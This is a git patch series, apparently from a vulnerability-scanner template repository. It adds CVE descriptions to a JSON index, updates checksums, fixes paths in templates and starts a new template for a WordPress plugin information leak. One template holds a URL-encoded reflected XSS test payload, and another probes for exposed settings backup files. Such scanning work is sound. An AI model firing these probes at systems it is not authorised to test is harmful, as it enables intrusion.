newnode.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-48197.yaml"} {"ID":"CVE-2022-4897","Info":{"Name":"WordPress BackupBuddy \u003c8.8.3 - Cross Site Scripting","Severity":"medium","Description":"WordPress BackupBuddy plugin before 8.8.3 contains a cross-site vulnerability. The plugin does not sanitize and escape some parameters before outputting them back in various locations. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-4897.yaml"} +{"ID":"CVE-2023-6389","Info":{"Name":"WordPress Toolbar \u003c= 2.2.6 - Open Redirect","Severity":"medium","Description":"The plugin redirects to any URL via the \"wptbto\" parameter. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/ CVE-2023-6389.yaml"} {"ID":"CVE-2023-0099","Info":{"Name":"Simple URLs \u003c 115 - Cross Site Scripting","Severity":"medium","Description":"The plugin does not sanitise and escape some parameters before outputting them back in some pages, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-0099.yaml"} {"ID":"CVE-2023-0126","Info":{"Name":"SonicWall SMA1000 LFI","Severity":"high","Description":"Pre-authentication path traversal vulnerability in SMA1000 firmware version 12.4.2, which allows an unauthenticated attacker to access arbitrary files and directories stored outside the web root directory.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-0126.yaml"} {"ID":"CVE-2023-0159","Info":{"Name":"Extensive VC Addons for WPBakery page builder \u003c 1.9.1 - Unauthenticated RCE","Severity":"high","Description":"The plugin does not validate a parameter passed to the php extract function when loading templates, allowing an unauthenticated attacker to override the template path to read arbitrary files from the hosts file system. This may be escalated to RCE using PHP filter chains.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-0159.yaml"} @@ -2076,6 +2079,7 @@ {"ID":"CVE-2023-26842","Info":{"Name":"ChurchCRM 4.5.3 - Cross-Site Scripting","Severity":"medium","Description":"A stored Cross-site scripting (XSS) vulnerability in ChurchCRM 4.5.3 allows remote attackers to inject arbitrary web script or HTML via the OptionManager.php.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-26842.yaml"} {"ID":"CVE-2023-26843","Info":{"Name":"ChurchCRM 4.5.3 - Cross-Site Scripting","Severity":"medium","Description":"A stored Cross-site scripting (XSS) vulnerability in ChurchCRM 4.5.3 allows remote attackers to inject arbitrary web script or HTML via the NoteEditor.php.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-26843.yaml"} {"ID":"CVE-2023-27008","Info":{"Name":"ATutor \u003c 2.2.1 - Cross Site Scripting","Severity":"medium","Description":"ATutor \u003c 2.2.1 was discovered with a vulnerability, a reflected cross-site scripting (XSS), in ATtutor 2.2.1 via token body parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-27008.yaml"} +{"ID":"CVE-2023-27032","Info":{"Name":"PrestaShop AdvancedPopupCreator - SQL Injection","Severity":"critical","Description":"In the module “Advanced Popup Creator” (advancedpopupcreator) from Idnovate for PrestaShop, a guest can perform SQL injection in affected versions.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-27032.yaml"} {"ID":"CVE-2023-27034","Info":{"Name":"Blind SQL injection vulnerability in Jms Blog","Severity":"critical","Description":"The module Jms Blog (jmsblog) from Joommasters contains a Blind SQL injection vulnerability. This module is for the PrestaShop e-commerce platform and mainly provided with joommasters PrestaShop themes\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-27034.yaml"} {"ID":"CVE-2023-27159","Info":{"Name":"Appwrite \u003c=1.2.1 - Server-Side Request Forgery","Severity":"high","Description":"Appwrite through 1.2.1 is susceptible to server-side request forgery via the component /v1/avatars/favicon. An attacker can potentially access network resources and sensitive information via a crafted GET request, thereby also making it possible to modify data and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-27159.yaml"} {"ID":"CVE-2023-27179","Info":{"Name":"GDidees CMS v3.9.1 - Arbitrary File Download","Severity":"high","Description":"GDidees CMS v3.9.1 and lower was discovered to contain an arbitrary file download vulenrability via the filename parameter at /_admin/imgdownload.php.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-27179.yaml"} @@ -2263,6 +2267,8 @@ {"ID":"CVE-2023-44352","Info":{"Name":"Adobe Coldfusion - Cross-Site Scripting","Severity":"medium","Description":"Adobe ColdFusion versions 2023.5 (and earlier) and 2021.11 (and earlier) are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If an unauthenticated attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-44352.yaml"} {"ID":"CVE-2023-44353","Info":{"Name":"Adobe ColdFusion WDDX Deserialization Gadgets","Severity":"critical","Description":"Adobe ColdFusion versions 2023.5 (and earlier) and 2021.11 (and earlier) are affected by an Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-44353.yaml"} {"ID":"CVE-2023-4451","Info":{"Name":"Cockpit - Cross-Site Scripting","Severity":"medium","Description":"Cross-site Scripting (XSS) - Reflected in GitHub repository cockpit-hq/cockpit prior to 2.6.4.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4451.yaml"} +{"ID":"CVE-2023-44812","Info":{"Name":"mooSocial v.3.1.8 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site Scripting (XSS) vulnerability in mooSocial v.3.1.8 allows a remote attacker to execute arbitrary code by sending a crafted payload to the admin_redirect_url parameter of the user login function.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-44812.yaml"} +{"ID":"CVE-2023-45375","Info":{"Name":"PrestaShop PireosPay - SQL Injection","Severity":"high","Description":"In the module “PireosPay” (pireospay) up to version 1.7.9 from 01generator.com for PrestaShop, a guest can perform SQL injection in affected versions.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-45375.yaml"} {"ID":"CVE-2023-4547","Info":{"Name":"SPA-Cart eCommerce CMS 1.9.0.3 - Cross-Site Scripting","Severity":"medium","Description":"A vulnerability was found in SPA-Cart eCommerce CMS 1.9.0.3. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /search. The manipulation of the argument filter[brandid]/filter[price] leads to cross site scripting. The attack may be launched remotely. VDB-238058 is the identifier assigned to this vulnerability.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4547.yaml"} {"ID":"CVE-2023-45542","Info":{"Name":"MooSocial 3.1.8 - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability exisits in the q parameter on search function of mooSocial v3.1.8 which allows attackers to steal user's session cookies and impersonate their account via a crafted URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-45542.yaml"} {"ID":"CVE-2023-45671","Info":{"Name":"Frigate \u003c 0.13.0 Beta 3 - Cross-Site Scripting","Severity":"medium","Description":"Frigate is an open source network video recorder. Before version 0.13.0 Beta 3, there is a reflected cross-site scripting vulnerability in any API endpoints reliant on the `/\u003ccamera_name\u003e` base path as values provided for the path are not sanitized. Exploiting this vulnerability requires the attacker to both know very specific information about a user's Frigate server and requires an authenticated user to be tricked into clicking a specially crafted link to their Frigate instance. This vulnerability could exploited by an attacker under the following circumstances: Frigate publicly exposed to the internet (even with authentication); attacker knows the address of a user's Frigate instance; attacker crafts a specialized page which links to the user's Frigate instance; attacker finds a way to get an authenticated user to visit their specialized page and click the button/link. As the reflected values included in the URL are not sanitized or escaped, this permits execution arbitrary Javascript payloads. Version 0.13.0 Beta 3 contains a patch for this issue.\n","Classification":{"CVSSScore":"4.7"}},"file_path":"http/cves/2023/CVE-2023-45671.yaml"} @@ -2270,6 +2276,7 @@ {"ID":"CVE-2023-45852","Info":{"Name":"Viessmann Vitogate 300 - Remote Code Execution","Severity":"critical","Description":"In Vitogate 300 2.1.3.0, /cgi-bin/vitogate.cgi allows an unauthenticated attacker to bypass authentication and execute arbitrary commands via shell metacharacters in the ipaddr params JSON data for the put method.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-45852.yaml"} {"ID":"CVE-2023-4596","Info":{"Name":"WordPress Plugin Forminator 1.24.6 - Arbitrary File Upload","Severity":"critical","Description":"The Forminator plugin for WordPress is vulnerable to arbitrary file uploads due to file type validation occurring after a file has been uploaded to the server in the upload_post_image() function in versions up to, and including, 1.24.6. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-4596.yaml"} {"ID":"CVE-2023-4634","Info":{"Name":"Media Library Assistant \u003c 3.09 - Remote Code Execution/Local File Inclusion","Severity":"critical","Description":"A vulnerability in the Wordpress Media-Library-Assistant plugins in version \u003c 3.09 is vulnerable to a local file inclusion which leading to RCE on default Imagegick installation/configuration.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-4634.yaml"} +{"ID":"CVE-2023-46347","Info":{"Name":"PrestaShop Step by Step products Pack - SQL Injection","Severity":"critical","Description":"In the module “Step by Step products Pack” (ndk_steppingpack) up to 1.5.6 from NDK Design for PrestaShop, a guest can perform SQL injection in affected versions.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-46347.yaml"} {"ID":"CVE-2023-46359","Info":{"Name":"cPH2 Charging Station v1.87.0 - OS Command Injection","Severity":"critical","Description":"An OS command injection vulnerability in Hardy Barth cPH2 Ladestation v1.87.0 and earlier, may allow an unauthenticated remote attacker to execute arbitrary commands on the system via a specifically crafted arguments passed to the connectivity check feature.\n","Classification":{"CVSSScore":"9.6"}},"file_path":"http/cves/2023/CVE-2023-46359.yaml"} {"ID":"CVE-2023-46574","Info":{"Name":"TOTOLINK A3700R - Command Injection","Severity":"critical","Description":"An issue in TOTOLINK A3700R v.9.1.2u.6165_20211012 allows a remote attacker to execute arbitrary code via the FileName parameter of the UploadFirmwareFile function.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-46574.yaml"} {"ID":"CVE-2023-46747","Info":{"Name":"F5 BIG-IP - Unauthenticated RCE via AJP Smuggling","Severity":"critical","Description":"CVE-2023-46747 is a critical severity authentication bypass vulnerability in F5 BIG-IP that could allow an unauthenticated attacker to achieve remote code execution (RCE). The vulnerability impacts the BIG-IP Configuration utility, also known as the TMUI, wherein arbitrary requests can bypass authentication. The vulnerability received a CVSSv3 score of 9.8.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-46747.yaml"} @@ -2288,6 +2295,7 @@ {"ID":"CVE-2023-4973","Info":{"Name":"Academy LMS 6.2 - Cross-Site Scripting","Severity":"medium","Description":"A vulnerability was found in Academy LMS 6.2 on Windows. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /academy/tutor/filter of the component GET Parameter Handler. The manipulation of the argument searched_word/searched_tution_class_type[]/searched_price_type[]/searched_duration[] leads to cross site scripting. The attack can be launched remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4973.yaml"} {"ID":"CVE-2023-4974","Info":{"Name":"Academy LMS 6.2 - SQL Injection","Severity":"critical","Description":"A vulnerability was found in Academy LMS 6.2. It has been rated as critical. Affected by this issue is some unknown functionality of the file /academy/tutor/filter of the component GET Parameter Handler. The manipulation of the argument price_min/price_max leads to sql injection. The attack may be launched remotely. VDB-239750 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-4974.yaml"} {"ID":"CVE-2023-49785","Info":{"Name":"ChatGPT-Next-Web - SSRF/XSS","Severity":"critical","Description":"Full-Read SSRF/XSS in NextChat, aka ChatGPT-Next-Web\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2023/CVE-2023-49785.yaml"} +{"ID":"CVE-2023-5003","Info":{"Name":"Active Directory Integration WP Plugin \u003c 4.1.10 - Log Disclosure","Severity":"high","Description":"The Active Directory Integration / LDAP Integration WordPress plugin before 4.1.10 stores sensitive LDAP logs in a buffer file when an administrator wants to export said logs. Unfortunately, this log file is never removed, and remains accessible to any users knowing the URL to do so.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-5003.yaml"} {"ID":"CVE-2023-50290","Info":{"Name":"Apache Solr - Host Environment Variables Leak via Metrics API","Severity":"medium","Description":"Exposure of Sensitive Information to an Unauthorized Actor Vulnerability in Apache Solr.\nThe Solr Metrics API publishes all unprotected environment variables available to each Apache Solr instance. Users can specify which environment variables to hide, however, the default list is designed to work for known secret Java system properties. Environment variables cannot be strictly defined in Solr, like Java system properties can be, and may be set for the entire host,unlike Java system properties which are set per-Java-proccess.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2023/CVE-2023-50290.yaml"} {"ID":"CVE-2023-5074","Info":{"Name":"D-Link D-View 8 v2.0.1.28 - Authentication Bypass","Severity":"critical","Description":"Use of a static key to protect a JWT token used in user authentication can allow an for an authentication bypass in D-Link D-View 8 v2.0.1.28\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-5074.yaml"} {"ID":"CVE-2023-5089","Info":{"Name":"Defender Security \u003c 4.1.0 - Protection Bypass (Hidden Login Page)","Severity":"medium","Description":"The Defender Security WordPress plugin before 4.1.0 does not prevent redirects to the login page via the auth_redirect WordPress function, allowing an unauthenticated visitor to access the login page, even when the hide login page functionality of the plugin is enabled.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-5089.yaml"} @@ -2346,6 +2354,7 @@ {"ID":"CVE-2024-22319","Info":{"Name":"IBM Operational Decision Manager - JNDI Injection","Severity":"critical","Description":"IBM Operational Decision Manager 8.10.3, 8.10.4, 8.10.5.1, 8.11, 8.11.0.1, and 8.12.0.1 is susceptible to remote code execution attack via JNDI injection when passing an unchecked argument to a certain API. IBM X-Force ID: 279145.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-22319.yaml"} {"ID":"CVE-2024-22320","Info":{"Name":"IBM Operational Decision Manager - Java Deserialization","Severity":"high","Description":"IBM Operational Decision Manager 8.10.3, 8.10.4, 8.10.5.1, 8.11, 8.11.0.1, and 8.12.0.1 could allow a remote authenticated attacker to execute arbitrary code on the system, caused by an unsafe deserialization. By sending specially crafted request, an attacker could exploit this vulnerability to execute arbitrary code in the context of SYSTEM. IBM X-Force ID: 279146.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2024/CVE-2024-22320.yaml"} {"ID":"CVE-2024-23334","Info":{"Name":"aiohttp - Directory Traversal","Severity":"high","Description":"aiohttp is an asynchronous HTTP client/server framework for asyncio and Python. When using aiohttp as a web server and configuring static routes, it is necessary to specify the root path for static files. Additionally, the option 'follow_symlinks' can be used to determine whether to follow symbolic links outside the static root directory. When 'follow_symlinks' is set to True, there is no validation to check if reading a file is within the root directory. This can lead to directory traversal vulnerabilities, resulting in unauthorized access to arbitrary files on the system, even when symlinks are not present. Disabling follow_symlinks and using a reverse proxy are encouraged mitigations. Version 3.9.2 fixes this issue.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-23334.yaml"} +{"ID":"CVE-2024-2340","Info":{"Name":"Avada \u003c 7.11.7 - Information Disclosure","Severity":"medium","Description":"The Avada theme for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 7.11.6 via the '/wp-content/uploads/fusion-forms/' directory. This makes it possible for unauthenticated attackers to extract sensitive data uploaded via an Avada created form with a file upload mechanism.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-2340.yaml"} {"ID":"CVE-2024-2389","Info":{"Name":"Progress Kemp Flowmon - Command Injection","Severity":"critical","Description":"In Flowmon versions prior to 11.1.14 and 12.3.5, an operating system command injection vulnerability has been identified. An unauthenticated user can gain entry to the system via the Flowmon management interface, allowing for the execution of arbitrary system commands.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-2389.yaml"} {"ID":"CVE-2024-23917","Info":{"Name":"JetBrains TeamCity \u003e 2023.11.3 - Authentication Bypass","Severity":"critical","Description":"In JetBrains TeamCity before 2023.11.3 authentication bypass leading to RCE was possible\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-23917.yaml"} {"ID":"CVE-2024-24131","Info":{"Name":"SuperWebMailer 9.31.0.01799 - Cross-Site Scripting","Severity":"medium","Description":"SuperWebMailer v9.31.0.01799 was discovered to contain a reflected cross-site scripting (XSS) vulenrability via the component api.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2024/CVE-2024-24131.yaml"} @@ -2371,6 +2380,7 @@ {"ID":"CVE-2024-32399","Info":{"Name":"RaidenMAILD Mail Server v.4.9.4 - Path Traversal","Severity":"high","Description":"Directory Traversal vulnerability in RaidenMAILD Mail Server v.4.9.4 and before allows a remote attacker to obtain sensitive information via the /webeditor/ component.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-32399.yaml"} {"ID":"CVE-2024-3273","Info":{"Name":"D-Link Network Attached Storage - Command Injection and Backdoor Account","Severity":"high","Description":"UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, was found in D-Link DNS-320L, DNS-325, DNS-327L and DNS-340L up to 20240403. Affected is an unknown function of the file /cgi-bin/nas_sharing.cgi of the component HTTP GET Request Handler. The manipulation of the argument system leads to command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259284. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.\n","Classification":{"CVSSScore":"7.3"}},"file_path":"http/cves/2024/CVE-2024-3273.yaml"} {"ID":"CVE-2024-3400","Info":{"Name":"GlobalProtect - OS Command Injection","Severity":"critical","Description":"A command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-3400.yaml"} +{"ID":"CVE-2024-4040","Info":{"Name":"CrushFTP VFS - Sandbox Escape LFR","Severity":"critical","Description":"VFS Sandbox Escape in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows remote attackers with low privileges to read files from the filesystem outside of VFS Sandbox.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-4040.yaml"} {"ID":"CVE-2024-4348","Info":{"Name":"osCommerce v4.0 - Cross-site Scripting","Severity":"medium","Description":"A vulnerability, which was classified as problematic, was found in osCommerce 4. Affected is an unknown function of the file /catalog/all-products. The manipulation of the argument cat leads to cross site scripting. It is possible to launch the attack remotely.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2024/CVE-2024-4348.yaml"} {"ID":"CVE-2001-1473","Info":{"Name":"Deprecated SSHv1 Protocol Detection","Severity":"high","Description":"SSHv1 is deprecated and has known cryptographic issues.","Classification":{"CVSSScore":"7.5"}},"file_path":"network/cves/2001/CVE-2001-1473.yaml"} {"ID":"CVE-2011-2523","Info":{"Name":"VSFTPD 2.3.4 - Backdoor Command Execution","Severity":"critical","Description":"VSFTPD v2.3.4 had a serious backdoor vulnerability allowing attackers to execute arbitrary commands on the server with root-level access. The backdoor was triggered by a specific string of characters in a user login request, which allowed attackers to execute any command they wanted.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2011/CVE-2011-2523.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index 6385089a27..38bc006309 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -c29ef56ef3383c354d9b91b4b82b0f25 +ea5ada70ef2729a28e421170bbcd8e9c From bf14d11f4f4f2ecf021a92b08bbf63f5b1c19f65 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 6 May 2024 11:07:24 +0000 Subject: [PATCH 0610/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index adc827771a..c0a142d9c5 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -15,6 +15,7 @@ on: - 'http/cves/2023/CVE-2023-32077.yaml' - 'http/cves/2023/CVE-2023-38964.yaml' - 'http/cves/2023/CVE-2023-43208.yaml' + - 'http/cves/2023/CVE-2023-44812.yaml' - 'http/cves/2023/CVE-2023-45375.yaml' - 'http/cves/2023/CVE-2023-46347.yaml' - 'http/cves/2023/CVE-2023-4973.yaml' From 5694b1407ef108ca6465ec978cdabbfe3ae4da9f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 6 May 2024 11:08:16 +0000 Subject: [PATCH 0611/1768] Auto Generated Templates Checksum [Mon May 6 11:08:16 UTC 2024] :robot: --- templates-checksum.txt | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 30e911bee7..99c3ea8948 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -187,8 +187,8 @@ code/privilege-escalation/linux/rw-sudoers.yaml:f974b1d1a68fd7a8cd24b6f1b61855dd code/privilege-escalation/linux/sudo-nopasswd.yaml:3117c141f35b9229b6ebe1db10a4fef77aa6ee17 code/privilege-escalation/linux/writable-etc-passwd.yaml:c0ad4796f42aab9c901b52b52b91940172d070e9 contributors.json:951e2ab8bbae42da01f52da9ef0a14ce7f17e159 -cves.json:407b0f48544c06238f85e8a73da136535098657a -cves.json-checksum.txt:285336192b26f8a99ed08645277512703539c410 +cves.json:d315321b205a1522fe76396ad0aae34803fbcc4e +cves.json-checksum.txt:d71b2b3afa76b54bec28bb2bf6de398a3921e26e dast/cves/2018/CVE-2018-19518.yaml:06ecee25413d9f238e2ae0138b4775f0243e8d22 dast/cves/2021/CVE-2021-45046.yaml:d470397419ae4ef5db02b0a833013fe295576396 dast/cves/2022/CVE-2022-34265.yaml:e006df0567f928e43d40050f55d5928a3fbff17e @@ -4133,6 +4133,7 @@ http/exposed-panels/openvpn-connect.yaml:92b51be8820e8d19dcab982f32e889e0ac84fc0 http/exposed-panels/openvpn-monitor.yaml:8bdcaa711f6852aeae49b0dde458dd17ed94f146 http/exposed-panels/openvpn-router-management.yaml:4c372e21e9ecc176fd0e9edd4fa3195012d17bbf http/exposed-panels/openvz-web-login.yaml:37b140070fa9fc0fc6ff0b5d95fbb7b6dd660aa6 +http/exposed-panels/openwebui-panel.yaml:b9564ac8cb5097946e5c7fd4975be56fe1006380 http/exposed-panels/openwrt/openwrt-luci-panel.yaml:23c9398019d54040ec5ec64239b8ef54ad683c06 http/exposed-panels/openwrt-login.yaml:99bc6770cd1dd9318d0575323ac32f92e4d8ff88 http/exposed-panels/openx-panel.yaml:1d6be9b221101c2f1fc724e0273450075e0c46e6 @@ -8478,7 +8479,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:dabf4f54664a402ff014d2ef07584bb7240bb0b0 +templates-checksum.txt:5201eedf84b2eae1584f081e861dff42e5d421b6 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From e1eaddadd0b276e77f9aa5beee7dfd13005165ff Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 6 May 2024 11:08:40 +0000 Subject: [PATCH 0612/1768] Auto Template Signing [Mon May 6 11:08:40 UTC 2024] :robot: --- http/cves/2023/CVE-2023-44812.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2023/CVE-2023-44812.yaml b/http/cves/2023/CVE-2023-44812.yaml index efd4a6916c..6f93166dc3 100644 --- a/http/cves/2023/CVE-2023-44812.yaml +++ b/http/cves/2023/CVE-2023-44812.yaml @@ -57,3 +57,4 @@ http: - 'contains(header, "text/html")' - 'contains(body, "")' condition: and +# digest: 4b0a00483046022100f555f0259ec83f340fb6efe6252abd7b67f304c538fe2d4bb5a46d4a3e7d209e022100f7db3b06b1e97e43235ec12bfd7dc548956be134f2728dc384fc52e4ed35af51:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 90936bf152cdb71a2645c7104ac75da5d5f8e154 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 6 May 2024 17:34:46 +0530 Subject: [PATCH 0613/1768] Update gz-forum-script-xss.yaml --- http/vulnerabilities/other/gz-forum-script-xss.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/vulnerabilities/other/gz-forum-script-xss.yaml b/http/vulnerabilities/other/gz-forum-script-xss.yaml index 0aeac558e7..df119d50cf 100644 --- a/http/vulnerabilities/other/gz-forum-script-xss.yaml +++ b/http/vulnerabilities/other/gz-forum-script-xss.yaml @@ -17,7 +17,7 @@ info: http: - method: GET path: - - "{{BaseURL}}preview.php?controller=Load&action=index&catid=moztj%22%3E%3Cscript%3Ealert(document.domain)%3C%2fscript%3Ems3ea&down_up=a" + - "{{BaseURL}}/preview.php?controller=Load&action=index&catid=moztj%22%3E%3Cscript%3Ealert(document.domain)%3C%2fscript%3Ems3ea&down_up=a" matchers: - type: dsl From 18ec2125a4fc6449f3f8ce77dae1fba6d308c249 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 6 May 2024 17:35:26 +0530 Subject: [PATCH 0614/1768] Update settings-php-files.yaml --- http/exposures/backups/settings-php-files.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/exposures/backups/settings-php-files.yaml b/http/exposures/backups/settings-php-files.yaml index 04b9bf9234..d719a87f76 100644 --- a/http/exposures/backups/settings-php-files.yaml +++ b/http/exposures/backups/settings-php-files.yaml @@ -22,7 +22,7 @@ http: - "{{BaseURL}}/settings.php.save" - "{{BaseURL}}/settings.php.swp" - "{{BaseURL}}/settings.php.txt" - - "{{BaseURL}}config/settings.old.php" + - "{{BaseURL}}/config/settings.old.php" matchers-condition: and matchers: @@ -35,4 +35,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100eba9de4436d8e08669f91da6cbd54d44279778bcf9fec5b5e930a1d6b5f8e56e022100a11699b4af7715f48e25cc159b1709c6396bf4ae8be69c37d82a477bc75689f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100eba9de4436d8e08669f91da6cbd54d44279778bcf9fec5b5e930a1d6b5f8e56e022100a11699b4af7715f48e25cc159b1709c6396bf4ae8be69c37d82a477bc75689f5:922c64590222798bb761d5b6d8e72950 From bea438266200f16cbd04327fb44d80147d7787b5 Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Mon, 6 May 2024 19:23:48 +0300 Subject: [PATCH 0615/1768] add cve-2024-33575 --- http/cves/2024/CVE-2024-33575.yaml | 37 ++++++++++++++++++++++++++++++ 1 file changed, 37 insertions(+) create mode 100644 http/cves/2024/CVE-2024-33575.yaml diff --git a/http/cves/2024/CVE-2024-33575.yaml b/http/cves/2024/CVE-2024-33575.yaml new file mode 100644 index 0000000000..f95ac77187 --- /dev/null +++ b/http/cves/2024/CVE-2024-33575.yaml @@ -0,0 +1,37 @@ +id: CVE-2024-33575 + +info: + name: User Meta WP Plugin < 3.1 - Sensitive Information Exposure + author: Kazgangap + severity: medium + description: | + The User Meta is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.0 via the /views/debug.php file. This makes it possible for unauthenticated attackers, with to extract sensitive configuration data. + remediation: Fixed in 3.1 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2024-33575 + - https://wpscan.com/vulnerability/3b75549c-3fc5-4e6f-84ae-264d8276bfb3/ + - https://patchstack.com/database/vulnerability/user-meta/wordpress-user-meta-plugin-3-0-sensitive-data-exposure-vulnerability?_s_id=cve + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2024-33575 + cwe-id: CWE-200 + epss-score: 0.00043 + epss-percentile: 0.08268 + metadata: + vendor: User Meta + product: User Meta + framework: wordpress + tags: exposure,wordpress,usermeta,cve2024,wpscan + +http: + - method: GET + path: + 